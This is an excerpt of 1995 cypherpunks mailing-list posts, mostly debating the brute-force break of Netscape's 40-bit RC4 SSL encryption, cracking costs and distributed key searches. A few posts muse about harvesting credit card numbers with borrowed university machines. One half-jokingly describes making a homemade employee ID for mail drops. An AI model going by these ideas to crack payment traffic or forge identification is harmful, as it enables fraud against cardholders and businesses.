laws I'm violating) or on getting publicity for such a scheme? This
might be easier than we think, as the media [at least the WSJ] is well
aware of the bookie's superior accuracy & lower cost.

Thank you.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Glenn Powers <gpowers@spectrum.bradley.edu>
Date: Thu, 17 Aug 95 09:08:30 PDT
To: cypherpunks@toad.com
Subject: Netsacpe's Offical Response
Message-ID: <199508171711.MAA02559@spectrum.bradley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Originally From shank@netscape.com  Thu Aug 17 11:42:39 1995
Received: from lydia.bradley.edu (root@lydia.bradley.edu [136.176.5.15]) by spectrum.bradley.edu (8.6.12/8.6.9) with ESMTP id LAA02511 for <gpowers@spectrum.bradley.edu>; Thu, 17 Aug 1995 11:42:36 -0500
Received: from bradley.bradley.edu (daemon@bradley.bradley.edu [136.176.5.10]) by lydia.bradley.edu (8.6.9/8.6.9) with ESMTP id KAA02851 for <gpowers@lydia.bradley.edu>; Thu, 17 Aug 1995 10:39:21 -0500
Received: (from daemon@localhost) by bradley.bradley.edu (8.6.12/8.6.12) id KAA01320 for gpowers@lydia.bradley.edu; Thu, 17 Aug 1995 10:39:18 -0500
Received: from neon.netscape.com (neon.netscape.com [198.93.92.10]) by bradley.bradley.edu (8.6.12/8.6.12) with ESMTP id KAA01310 for <gpowers@bradley.edu>; Thu, 17 Aug 1995 10:39:12 -0500
Received: from [198.93.94.118] (Shank.mcom.com [198.93.94.118]) by neon.netscape.com (950215.SGI.8.6.10/8.6.9) with SMTP id IAA26102 for <gpowers@bradley.edu>; Thu, 17 Aug 1995 08:38:34 -0700
X-Sender: shank@pop.mcom.com
Message-Id: <v02110107ac5914142373@[198.93.94.118]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Thu, 17 Aug 1995 08:44:45 -0700
X-PH: V4.1@bradley
To: gpowers@bradley.edu
From: shank@netscape.com (Peter Shank)
Subject: Netscape security

Glen,

We're sending this response to the press and interested parties; it may also get posted on home.netscape.com.

Best regards...

-Peter

Late Tuesday evening a person from France posted a news article to the
hacker community claiming success at decrypting a single encrypted message
that had been posted as a challenge on the Internet sometime on or before
July 14, 1994. His response to the challenge is described in an email that
has been forwarded widely across the Internet.

What this person did is decrypt one encrypted message that used RC4-40 for
encryption. He used 120 workstations and two parallel supercomputers for 8
days to do so. As many have documented, a single RC4-40 encrypted message
takes 64 MIPS-years of processing power to break, and this roughly
corresponds to the amount of computing power that was used to decrypt the
message.

Important points to understand:

  1. He broke a single encrypted message. For him to break another message
     (even from the same client to the same server seconds later) would
     require *another* 8 days of 120 workstations and a few parallel
     supercomputers. The work that goes into breaking a single message can't
     be leveraged against other messages encrypted with other encryption
     keys.

  2. The standard way to determine the level of security of any encryption
     scheme is to compare the cost of breaking it versus the value of the
     information that can be gained. In this case he had to use roughly
     $10,000 worth of computing power (ballpark figure for having access to
     120 workstations and a few parallel supecomputers for 8 days) to break
     a single message. Assuming the message is protecting something of less
     value than $10,000, then this information can be protected with only
     RC4-40 security. For information of greater value, currently available
     RC4-128 security should be used.

  3. Inside the US, software can support a range of stronger encryption
     options, including RC4-128, which is 2^88 times harder to break.
     Meaning that the compute power required to decrypt such a message would
     be more than 1,000,000,000,000 (trillion) times greater than that which
     was used to decrypt the RC4-40 message. This means that with forseeable
     computer technology this is practically impossible.

So in conclusion, we think RC4-40 is strong enough to protect consumer-level
credit-card transactions -- since the cost of breaking the message is
sufficiently high to make it not worth the computer time required to do so
-- and that our customers should use higher levels of security, particularly
RC4-128, whenever possible. This level of security has been available in the
U.S. versions of our products since last April. Because of export controls
it has not been available outside the U.S. We would appreciate your support
in lobbying the U.S. government to lift the export controls on encryption.
If you'd like to help us lobby the government send email to
export@netscape.com.

Finally, we'd like to reiterate that all this person has done is decrypt
one single RC4-40 message. RC4 the algorithm and products which use the
algorithm remain as secure as always.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Weisberger <jweis@primenet.com>
Date: Thu, 17 Aug 95 12:19:37 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Cost to Crack Keys
In-Reply-To: <ac58d999110210044b77@[205.199.118.202]>
Message-ID: <199508171919.MAA19041@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text


> 
> But, Mark, estimates of the cost to crack a key _must_ be based on market
> prices, not on opportunistic access to machines. Such access is good for
> occasional, or one-shot, deals, but not for routine use.
> 

Is it opportunistic access of machines, Tim, or simple use of available machines? I don't 
think this kind of access is limited to one shot deals.  I've seen enough environments where 
the cpu cycles to achieve these kinds of tasks (brute forcing keys) are available and  no one 
is much going to care if it is done in a lowprofile manner.

> For example, one doesn't say "Hey, I don't see how Hertz can charge $40 a
> day to rent a car...my friend lets me use his for free."
> 

Indeed - but what is the real market value of the cpu cycles needed to pull off the task at 
hand? I think its far less than $10,000.00

> 
> "Standard accounting practices" dictate the way to estimate production costs.
> 

Thats like accepting the amortized value of an object as its real value. I don't think GAAP 
really comes into play here...



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 17 Aug 95 12:24:49 PDT
To: cypherpunks@toad.com
Subject: Re:  Breaking DES anyone? (was: Breaking RC4-40 for less)
Message-ID: <199508171923.MAA17947@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: aba@dcs.exeter.ac.uk
> Another approach is to do lots of keys simultaneously - so you set up
> this distributed effort which is continually re-sweeping the 40 bit
> keyspace, say every couple of days or whatever.  You can sweep for
> more than one key at once at very low incremental cost, an extra key
> costs close to nothing.  So say you are searching for 1000 keys at
> once - a dragnet approach - well keys just pop out at random as they
> are hit, maybe straight away maybe at worst case the sweeping
> roll-over time, but on average a key will fall out every 3 minutes.

I don't see how you can sweep for more than one key at once at low cost.
Because of the salt, every possible SSL encrypted message has to be swept
independently.  You can't sweep for two messages' keys at once because the
input to the MD5 is different even for the same 40-bit key.

If digital cash in micro amounts became practical, people could be paid
to let the "idle cycles" on their computers be used for this kind of
highly parallel application.  (Some people have speculated that graphics
rendering would be another suitable choice.)  It would be interesting to
see what the market price of cycles became in such an environment.  That
would give a better benchmark for the cost to break keys.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 17 Aug 95 12:32:03 PDT
To: cypherpunks@toad.com
Subject: Re: SSL challenge -- broken !
Message-ID: <199508171930.MAA18815@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I can see three ways in which RC4-40 is weaker now than it was when it
was approved for "fast track" export approval.

First, of course, computers get faster every year.  So any fixed cipher
becomes relatively weaker as time goes on.

Second, until earlier this year RC4 was secret.  Then it was posted
anonymously to the cypherpunks list and later to sci.crypt.  Before that
time, only a much smaller number of people would have been in a position
to launch an exhaustive search attack.  But now that the source is
public, virtually anyone can try to crack it.  So this is really a very
significant loss of security.  It also illustrates the difficulty in
keeping secrets which will occur due to the kind of technology we
advocate.

Third, there is much more interest now in actually doing massively
parallel encryption attacks.  The RSA-129 project got a lot of publicity,
and it was followed by the attack on the "Blacknet" 384 bit PGP key by a
small private group earlier this year.  People are aware now of how easy
it is to use parallelism in this kind of work, and with the software Adam
Back has worked on this could become even more popular in the future.  So
all this talk about "6,000 MIPS years" will not be as impressive if any
moderately sized hacker group can put that much computing power together
in a few days.

With these changes, RC4-40 has lost a significant amount of the
cryptographic strength it may have had a year or two ago.  It is
certainly time for the exportable key size to be expanded.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 17 Aug 95 12:39:52 PDT
To: cypherpunks@toad.com
Subject: Strong encryption for credit cards only
Message-ID: <199508171938.MAA19803@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


In response to the SSL break, Netscape has said they are working on
improved encryption specifically for credit card numbers.  This would use
56 bit keys, presumably DES.  I got this from the SJ Mercury News online,
<URL:http://www.sjmercury.com/nav.htm>.

While we can applaud any measure to increase user privacy and security,
it will be unfortunate if this enhanced encryption, which will
apparently be limited strictly to credit card information in order to
get export approval, weakens support for efforts to allow expanded
export approval of all sorts of encryption.

There are many aspects to privacy beyond credit card numbers.  The bottom
line remains that overseas companies are able to put stronger encryption
in their products than American companies can in their export versions.
We need to keep offering good arguments for why users will need strong
encryption for more than their credit card info.  If the message gets out
that this new measure solves the security problems on the internet then
that will be a big loss for our goals.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 17 Aug 95 09:40:53 PDT
To: cypherpunks@toad.com
Subject: Breaking RC4-40 for less
Message-ID: <9508171639.AA22016@all.net>
MIME-Version: 1.0
Content-Type: text


Since messages sent with netscape are fairly standard for the first so
many bytes, why not make a 2^30 element table, store it on a few
gigabytes of disk space, use a hash table on the message, and find the
keys to one in every 1,000 messages about 1 time per second.  If this
code is being used to send millions of credit transactions per day, we
should be able decode thousands of credit card numbers per day for a
one-time cost of about $5,00.

The $10,000 estimate of the cost of computing time is far too high
for a production-based attack on the netscape codes.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Thu, 17 Aug 95 12:50:00 PDT
To: cypherpunks@toad.com
Subject: Re: Cost to Crack Keys
In-Reply-To: <ac58d999110210044b77@[205.199.118.202]>
Message-ID: <199508171949.MAA03937@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> tcmay@got.net (Timothy C. May) writes:
> For example, one doesn't say "Hey, I don't see how Hertz can charge $40 a
> day to rent a car...my friend lets me use his for free."

> "Standard accounting practices" dictate the way to estimate production costs.

Actually, I do say that, but in a slightly different way.  If I want to
estimate the cost to get home from the airport, I might say "I have two
friends with cars who might give me a ride, or I could rent a car from
Hertz."  Most of the time a free car will be available; once in the last
couple of years I rented a car at the airport to get home.  My average
cost hasn't been zero, but has certainly been a lot less than $40 ($29
from National, but that's not important now).

Finding a cheap or free ride from one place to another should not be a
problem if you live in a city of helpful people driving to and fro in
vehicles with no passengers.

There are lots of free seats on the CPU bus today!

Share and enjoy...

	Jim Gillogly
	Highday, 25 Wedmath S.R. 1995, 19:46




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Thomlinson <mattt@microsoft.com>
Date: Thu, 17 Aug 95 13:39:55 PDT
To: tcmay@got.net
Subject: Re: First known purchase of physical goods with cyberbucks
Message-ID: <9508172125.AA12793@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


don't forget GhostMarks! :)

matt
----------
From: Timothy C. May  <tcmay@got.net>
To: "Marcel van der Peijl"  <bigmac@digicash.com>;  <mark@unicorn.com>
Cc:  <cypherpunks@toad.com>;  <ecm@ai.mit.edu>;  <steve@webmedia.com>
Subject: Re: First known purchase of physical goods with cyberbucks
Date: Thursday, August 17, 1995 11:59AM

At 6:39 PM 8/17/95, Marcel van der Peijl wrote:
>> Anyway, if anyone knows of an earlier transaction of cyberbucks for physical
>> goods than this (at 15:00 GMT 17th August 1995), then please let me know.
>
>As far as I know, the first transaction took place when I (while
>testing) bought a postcard from GlobalX, the first ecash store to
>open besides our own (and mine). It is stored in the 'DigiCash
>museum' next to early prototypes of all kinds of smartcards,
>emulators, wallets etc.
>
>This must have been around October last year (or August? Can't make
>out the postmark). Hundreds of cards were shipped by several shops,
>and stickers, lotteries, etc. Check the 'physical objects' section
>on http://www.digicash.com/shops/categorical.html
>
>Maybe you should restrict the 'first known' claim to 'first known
>purchase of physical goods with cyberbucks traded at the ECM'.
>
>Sorry!

Also, there are other potential claims for this sort of thing. Based on
varying extents to which the "electronic money" is really secure, is
cryptographically interesting, etc.

For example, more than two years ago on this list (I think it was spring of
'93, but it could've been spring of '94) there were a flurry of
transactions involving the "MagicMoney" and "TackyTokens" of Pr0ductCypher
and others. I recall Black Unicorn and others talking about transactional
exchanges involving sixpacks of beer or soft drinks. I could check my
archives, but you get the point.

And before that, there were "HExmarks" being used on the Extropians list.
There was a nominal conversion rate to real dollars, and at the time I left
that list, I had more HExmarks than anyone else.

And dozens of token-based systems, coupons, LETS systems, etc. Not to
mention the various commercial smartcards and "e money" systems.

Granted, most of these are not "Chaumian," which is what most of us think
of us as digital cash.

Claiming credit for being first is a tough issue.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Thu, 17 Aug 95 11:27:25 PDT
To: gpowers@spectrum.bradley.edu
Subject: Re:  Netsacpe's Offical Response
Message-ID: <199508171825.NAA16520@edison.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


>So in conclusion, we think RC4-40 is strong enough to protect consumer-level
>credit-card transactions -- since the cost of breaking the message is
>sufficiently high to make it not worth the computer time required to do so
....
....
>Finally, we'd like to reiterate that all this person has done is decrypt
>one single RC4-40 message. RC4 the algorithm and products which use the
>algorithm remain as secure as always.
>
>
>

I disagree with the cost assumptions that it costs $10K. These
are "relatively" imaginary costs. If you already have the machines 
(like a lot of universities and corporations) then the marginal
cost of breaking the key is practically nil. The person doing the
cracking certainly doesn't incur any costs. So what if it takes
2 weeks. An evil student/hacker/whatever would be willing to wait two
weeks for a credit card with a $5-$oo limit if he could just use
the machines at night when people might not notice. 
Just my $.02

Re: security of RC4 - agreed completely.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Taffs <dat@ebt.com>
Date: Fri, 18 Aug 95 07:49:51 PDT
To: maryt@wv.mentorg.com
Subject: [frissell@panix.com: Re: CoS Raid on "Copyright Terrorist"]
Message-ID: <9508172030.AA10875@veronica.EBT.COM>
MIME-Version: 1.0
Content-Type: text/plain


--RAK01412.808623897/portland.ebt.com
Content-Type: message/rfc822

Return-Path: dat
Received: from veronica.EBT.COM (veronica [198.112.112.3]) by portland.ebt.com (8.6.9/8.6.9) with SMTP id RAA13095 for <maryt@wv.mentorg.com>; Tue, 15 Aug 1995 17:52:35 -0700
From: David Taffs <dat>
Received: by veronica.EBT.COM (5.0/CF5.1L)
	id AA10092; Tue, 15 Aug 1995 17:50:51 +0800
Date: Tue, 15 Aug 1995 17:50:51 +0800
Message-Id: <9508160050.AA10092@veronica.EBT.COM>
To: maryt@wv.mentorg.com
Subject: [frissell@panix.com: Re: CoS Raid on "Copyright Terrorist"]
content-length: 1370

X-Sender: frissell@panix.com
X-Mailer: Windows Eudora Version 2.1.1
Mime-Version: 1.0
Date: Tue, 15 Aug 1995 16:00:06 -0400
To: m5@dev.tivoli.com (Mike McNally)
From: Duncan Frissell <frissell@panix.com>
Subject: Re: CoS Raid on "Copyright Terrorist"
Cc: cypherpunks@toad.com
Sender: owner-cypherpunks@toad.com
Precedence: bulk
Content-Type: text/plain; charset="us-ascii"
Content-Length: 975

At 01:17 PM 8/15/95 CDT, Mike McNally wrote:

>Mailboxes Etc. insists on getting a picture ID; at least they did last
>time I checked.  Some smaller mom&pop places will take a business card
>(time to break out your Jim Rockford Business Card Fabrication Kit).

I always supply picture ID these days.  It's really rough getting those cold
lamination-Employee ID kits from Office Depot, taking the polaroid on a blue
background, trimming the photo, and assembling the employment ID.  I'm one
of my best employees.

Don't forget to include your EMP_NO.  It gives the clerk something to write
down.

DCF

"Governments are simply not fully sovereign in the world of information;
their powers within it are strangely limited....This weakness of government
control within computer nets--a product of strongly protected privacy, a
lack of frontiers and confusions of jurisdiction--make them natural places
for subversion." -- The Economist "Softwar--A Survey of Defence Technology"



--RAK01412.808623897/portland.ebt.com--





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Taffs <dat@ebt.com>
Date: Fri, 18 Aug 95 07:49:50 PDT
To: maryt@wv.mentorg.com
Subject: [frissell@panix.com: Re: CoS Raid on "Copyright Terrorist"]
Message-ID: <9508172033.AA10908@veronica.EBT.COM>
MIME-Version: 1.0
Content-Type: text/plain


--RAV01412.808624601/portland.ebt.com
Content-Type: message/rfc822

Return-Path: dat
Received: from veronica.EBT.COM (veronica [198.112.112.3]) by portland.ebt.com (8.6.9/8.6.9) with SMTP id MAA01172 for <maryt@wv.mentorg.com>; Tue, 15 Aug 1995 12:06:21 -0700
From: David Taffs <dat>
Received: by veronica.EBT.COM (5.0/CF5.1L)
	id AA08383; Tue, 15 Aug 1995 12:04:37 +0800
Date: Tue, 15 Aug 1995 12:04:37 +0800
Message-Id: <9508151904.AA08383@veronica.EBT.COM>
To: maryt@wv.mentorg.com
Subject: [frissell@panix.com: Re: CoS Raid on "Copyright Terrorist"]
content-length: 1249

X-Sender: frissell@panix.com
X-Mailer: Windows Eudora Version 2.1.1
Mime-Version: 1.0
Date: Tue, 15 Aug 1995 09:18:43 -0400
To: futplex@pseudonym.com (Futplex)
From: Duncan Frissell <frissell@panix.com>
Subject: Re: CoS Raid on "Copyright Terrorist"
Cc: cypherpunks@toad.com
Sender: owner-cypherpunks@toad.com
Precedence: bulk
Content-Type: text/plain; charset="us-ascii"
Content-Length: 855

At 09:28 AM 8/14/95 -0400, Futplex wrote:
>Some CoS news:
>
>This past Saturday (95/08/12) a prominent Church of Scientology litigator,
>Helena Kobrin, and some U.S. federal marshals raided the home of Arnaldo
>Lerma, seizing pretty much all his computer hardware, disks, etc.

So why is it that people insist on listing their home addresses with their
ISP's rather than a mail receiving service or something else.  It is very
hard to raid a mail drop and obtain anything useful.  While it is true that
if you blow up buildings, the Fibbies may be able to find you, quite simple
techniques can frustrate even quite dedicated private parties.

DCF

"We warned you mental defectives back in '65 that the socialized medicine
offered by Medicare and Medicaid would be expensive, lousy, and eventually
not there at all but you didn't believe us.  Good luck."



--RAV01412.808624601/portland.ebt.com--





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Thu, 17 Aug 95 11:38:27 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: RC40 and what we still need to do
Message-ID: <Pine.ULT.3.91.950817133221.13723B-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have been watching the backlash of the cracking of RC40 and am quite 
impressed with the fact that it is being used as a positive reason for 
repealing ITAR.  I expected the media to jump on the "hacker" bandwagon 
and denounce the efforts.

However, I think there is still value in writing the software that will 
allow cooperation amoung hundreds or thousands of people.  That way, we 
could harness the space CPU of machines all over the globe and make the 
cracking of this kind of stuff routine.  So instead of taking 8 days, it 
takes only a day or so, further eliminating the idea that it "takes too 
long to be worthwhile".  Maybe there would even be value in going at a 
128-bit key (granted, it would take a year).

I'd anticipate with proper advertising, easy-to-use software, and 
little programming knowledge require, we could easily harness 10,000+ 
machines and a few dozen parallel machines.

I know we have a 99.9% idle MasPAR I can contribute to the effort, which 
should be able to do 1million+ keys/sec.  It's just dying to have a 
purpose....

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMDNwmDokqlyVGmCFAQEzTQQAtkDhi0XD1L1PGJgSYA0XcxMXOIszjtB0
sQcHdSqeVHBpIn7K0/F4JE0tiIgXFhmaKsU8FaIaf/5sbDpRj/cTZXnvE/evt4G0
GKploXjcqXQ/dBpSWakCzsKLJvqvhKEyZyAnF/5VHgSI5WChMKYm68qiuDNyN05Q
He6bvbZGbBs=
=oPni
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++) ULU++ P+ L++ E---- W+(-) N++++ o+ K+++ w---
O- M+ V-- PS++>$ PE++>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++
G+++++ e++ h r-- y++**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Thu, 17 Aug 95 11:47:53 PDT
To: cypherpunks@toad.com
Subject: Message from a nobody...
Message-ID: <Pine.BSI.3.91.950817134106.18935A-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



I'm kind of a nobody.....
I can't write elaborate code.
I can't even crack keys, unless it's plug & play cracking.

But I do know SOMETHING important was done here.
And once it's been done, it only gets easier each time.

Congratulations to all of you!

Love Always,

Carol Anne

Member Internet Society - Certified BETSI Programmer - WWW Page Creation
-------------------------------------------------------------------------
Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure
carolann@censored.org             __  __     ____  ___       ___ ____
carolab@primenet.com             /__)/__) / / / / /_  /\  / /_    /
carolb@spring.com               /   / \  / / / / /__ /  \/ /___  /
-------------------------------------------------------------------------
A great place to start
My Cyber Doc...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 17 Aug 95 14:04:59 PDT
To: cypherpunks@toad.com
Subject: new o'reilly security book
Message-ID: <199508172102.OAA04409@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



------- Forwarded Message

Date: Tue, 15 Aug 1995 14:08:44 -0700
From: Sara Winge <sara@ora.com>
Subject: New "Computer Crime" book from O'Reilly

FOR IMMEDIATE RELEASE                    
August 15, 1995                                   

TO REQUEST A REVIEW COPY, CONTACT: 
Sara Winge                             
sara@ora.com
707/829-0515

O'REILLY RELEASES HANDBOOK ON FIGHTING COMPUTER CRIME

SEBASTOPOL, CA--"Computer Crime: A Crimefighter's Handbook" is a
resource for anyone who needs to know what today's computer crimes look
like, how to prevent them, and how to detect, investigate, and
prosecute them if they do occur.  It contains basic computer security
information as well as extensive guidelines for investigators, law
enforcement, managers, and computer system administrators. The book has
been reviewed by representatives of the U.S. Secret Service, the
Department of Justice, local police departments, district attorney's
offices, and law enforcement abroad.

"Computer Crime" describes the varieties of computer crimes and
profiles the computer criminal, using techniques developed for the FBI
and other law enforcement agencies. It outlines the vulnerabilities of
computer systems and discusses personnel, operational, physical, and
communications measures that can be taken to prevent computer crimes.
In addition, it contains a thorough treatment of effective methods for
investigating and prosecuting computer crimes, ranging from the
supplies needed for criminal investigation, to the detection and audit
tools used in investigation, to the presentation of evidence to a
jury.

                          # # # 

Computer Crime: A Crimefighter's Handbook 
By David Icove, Karl Seger & William VonStorch, with Consulting Editor
Eugene H. Spafford 
1st Edition August 1995 
464 pages, ISBN:  1-56592-086-4, $24.95






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 17 Aug 95 14:06:45 PDT
To: cypherpunks@toad.com
Subject: nontoxic neuron interface built
Message-ID: <199508172104.OAA04707@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



for all of you eagerly awaiting the day you can literally "jack in"
to cyberspace..

------- Forwarded Message

Date: Wed, 16 Aug 95 13:44:34 -0400 
Subject: FW: 'Cyberpunk' neural interface?


- - ----------
From: James McDaniel

X-MsXMTID: red-14-msg950816203742MTP[01.00.00]0000009e-34570

The following item is taken from:

	http://www.hep.net/documents/newsletters/pnu/1995/pnu-236.html

James

- - --------------------

PHYSICS NEWS UPDATE
The American Institute of Physics Bulletin of Physics News
Number 236: August 7, 1995 by Phillip F. Schewe and Ben Stein

A SILICON DEVICE FOR TRIGGERING ELECTRICAL ACTIVITY IN A NERVE CELL
has been constructed, opening possibilities for two-way, non-toxic
communication between computer chips and nerve cells. Previous
devices for stimulating nerve cells were metallic devices generating
ordinary electric currents. Not only do such devices have
corrosion-prone electrodes, but their currents create
electrochemical byproducts and heat that could damage the nerve
cells and themselves. The silicon device, constructed by
researchers at the Max Planck Institute for Biochemistry in
Germany, contains a "stimulation spot" that triggers neural
activity simply through the rearrangement of electric charge.
Insulated by silicon oxide, the stimulation spot has a size
(between 10 and 50 microns) matched to that of a leech nerve
cell to which it is connected. A voltage pulse applied to the
spot rearranges electric charge on the silicon oxide film and
the insulating membrane of the nerve cell, creating a buildup
of positive charge in the nerve cell which causes it to fire
above a certain threshold. The silicon device is capable of
triggering a single nerve cell without affecting other nearby
neurons. The device complements the previously designed "neuron
transistor," which receives ionic signals from nerve cells
and transcribes them to electronic signals in silicon. "These
two devices join the two worlds of information processing, the
silicon world of the computer and the water-world of the brain,"
says the Max Planck Institute's Peter Fromherz
(fromherz@vms.biochem.mpg.de). Developing this device for
biomedical applications, such as computer-controlled artificial
limbs, is not envisioned at the present moment, as researchers
will first need to build and understand devices that interact
with connective tissue and other non-neuronal cells in the body.
(Peter Fromherz and Alfred Stett, upcoming article in Physical
Review Letters; text and figures are available from AIP Public
Information, 301-209-3091, physnews@aip.org.)





- ------- End of Forwarded Message


------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 17 Aug 95 11:27:24 PDT
To: aba@dcs.exeter.ac.uk
Subject: Re: Breaking DES anyone? (was: Breaking RC4-40 for less)
In-Reply-To: <8875.9508171811@exe.dcs.exeter.ac.uk>
Message-ID: <9508171825.AA26001@all.net>
MIME-Version: 1.0
Content-Type: text


> Nice idea and one which works for pure RC4, but unfortunately not for
> 128 bit, 88 bit known + 40 bit unknown "export" SSL.
> 
> Netscape's SSL uses "40 bit keys" that are composed in a strange way:
> you are given 88 bits of known key, and this is combined with the 40
> bit key, to give a 128 bit key.  That key is used to do the
> encryption.  The problem is that this has a unix password salt like
> effect, only this time there are 88 bits of salt rather than 12 bits.
> So this means that you can't precompute anything on the 40 bits as the
> 88 bits are randomly generated, and likely vary with each session.

Ah!!!

Then here's my next alternative attack.

By a 100x100 Transputer (about \$120,000 to make one) and program it to
crack the SSL running 10,000 parallel computations.  If it takes 2 years
for the whole keyspace for each computer, it takes 1.75 hours to span
the whole key space.  Taking a 3 year write-off time and spending
$30,000 per year for maintenance, this comes to $70,000 per year, or
$14.08 per cracked key.  If I do 1,000 keys in parallel, that reduces
the cost to 1.4 cents per key.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Neal <dneal@usis.com>
Date: Thu, 17 Aug 95 12:35:56 PDT
To: "Rev. Mark Grant" <mark@unicorn.com>
Subject: Re: First known purchase of physical goods with cyberbucks
In-Reply-To: <Pine.3.89.9508171704.A1363-0100000@unicorn.com>
Message-ID: <Pine.BSI.3.91.950817135759.5199C-100000@usis.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 17 Aug 1995, Rev. Mark Grant wrote:

> 
> [Feel free to forward to anywhere you feel is appropriate]
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> 
> For some time now, Adam Back has been offering to sell RSA T-shirts for
> cyberbucks (DigiCash's experimental anonymous digital cash system), but
> no-one has had enough available to take him up on it. However, thanks to
> the success of the ecm mailing list (ecm@ai.mit.edu) and WWW site
> (http://www.c2.org/~mark/ecash/ecash.html), today I finally managed to 
> collect enough c$ to buy one.

I just had a wicked thought. What happens when people combine challenge key
cracking with e-cash?

Lesse -- 2^40 keys = 1,099,511,627,776 keys.  Damien was able to get
850000-1.3 million keys per second.  Let's go for the low-end and
use 8000 keys per second which is in the range of his sparcstations
(a very common machine on the internet).  We "only" need 38,178
machines to crack the key in 8 hours.   Each of those workstations
is going to test 28,800,000 keys and we'll assign a nominal value of
$1,000 to cracking the key.  (Most people have $1k of room on their
visa or m/c, no?)  Splitting the booty 50/50 gives someone $500 
or about 1.79 e-cents per 100k keys tested. 

So, could 38,000 people be enticed into running a sparc-cycle
cracking daemon for a 1 in 38,000 chance at $500?  :-)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Thu, 17 Aug 95 06:42:41 PDT
To: perry@piermont.com ("Perry E. Metzger")
Subject: Re: SSL challenge -- broken !
Message-ID: <7033.9508171341@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



> It has occured to me that, because the RC4 key crackers spend most
> of their time in key setup, you can crack N SSL sessions that you
> captured in not substantially more time than it took to crack
> 1. This is analagous to the way brute force Unix password file
> hacking operates.

This occurred to me a whila ago too, and I thought it a very cool
idea, as it would mean you could do loads of keys at once with little
additional compute time.  Then I changed my mind, there's a reason
this doesn't work with 40 + 88 SSL, I think.

It works well enough for straight RC4, as you just compare lots of
keys at once, the RC4 output which will be XORed just gets compared
against lots of sample plain text / cipher texts simulataneously.

The actual key used is the 40 bit key you're bruting, plus what is
effectively an 88 bit salt (in unix password nomenclature, only unix
password salts are typically 12 bits).

The actual 128 bit RC4 key is generated by taking the MD5 of the known
and unknown key bits, plus a couple of other things.  As the 88 known
bits are randomly generated you can't combine work.

If I have misunderstood something, or there is a way to work around
this, please explain, because being able to do this would be a huge
boon to the key breaker.  It would allow you to break keys at a
